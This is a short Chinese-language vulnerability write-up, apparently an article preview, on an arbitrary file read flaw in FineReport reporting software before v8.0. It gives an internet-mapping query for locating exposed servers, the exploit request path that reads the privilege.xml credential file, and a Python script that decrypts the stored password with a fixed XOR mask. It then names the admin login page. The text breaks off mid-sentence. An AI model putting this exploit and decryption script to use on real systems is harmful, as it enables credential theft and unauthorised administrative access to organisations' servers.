帆软FineReport报表get_geo_json任意文件读取

文章预览

漏洞描述 FineReport报表软件是一款纯Java编写的，集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。 FineReport v8.0版本存在任意文件读取漏洞，攻击者可利用漏洞读取网站任意文件。 漏洞影响 FineReport < v8 .0 网络测绘 app = "帆软-FineReport" 漏洞利用 漏洞路径：读取账户密码 / WebReport /ReportServer?op=chart =get_geo_json =privilege.xml 解密脚本（python） cipher = '___0022007c0039003b005100e3' #密文 PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码 Password = "" cipher = cipher[3:] #截断三位后 for i in range(int(len(cipher) / 4)): c1 = int( "0x" + cipher[i * 4:(i + 1) * 4], 16) c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8] Password = Password + chr(c2) print (Password) 访问后台系统进行登陆 /WebReport/ReportServer?op=fs 工具自动化检测及解密 🍻 🍻 🍻 🍻 🍻 🍻 失败是成功之母，只有经历过挫折，才能 ………………………………